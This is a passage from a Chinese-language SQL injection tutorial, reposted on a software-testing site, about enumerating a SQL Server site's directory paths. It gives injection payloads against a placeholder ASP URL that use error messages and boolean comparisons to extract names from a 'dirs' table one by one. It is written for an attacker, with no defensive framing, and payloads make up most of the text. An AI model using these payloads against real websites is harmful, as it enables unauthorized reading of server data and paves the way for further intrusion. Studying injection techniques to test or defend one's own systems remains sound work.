軟件測試開發技術SQL Server取得網站路徑的幾種方法及比較

dirs where paths not in( ’@.netpub’,’test’))--

返回：Microsoft OLE DB Provider for SQL Server 錯誤 80040e07

將 varchar 值 ’haha’轉換為數據類型為 int 的列時發生語法錯誤。

再依次爆出表中的目錄名稱!

好了,你應該知道怎么做了吧,哈哈,就是把得到的表名添到那個括號里,有多少就放多少吧,

一點技巧:

有時候你會發現當輸入類似

http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-

時不是顯示出錯,而是網頁顯示正常

暈了吧,別緊張哈

看看0<>(select top 1 paths from dirs) 說明返回是一個數字,

哈哈,測試一下看看是多少吧

100>(select top 1 paths from dirs)

返回正常

哈哈,用這種大于小于的方法很快就能猜出了

好我們繼續

比如當出現

59=(select top 1 paths from dirs)

返回正常,

ok,說明名字是59

輸入如下

http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from

dirs where paths not in( ’59’))--

記得帶上引號喲

文章來源于領測軟件測試網 http://www.kjueaiud.com/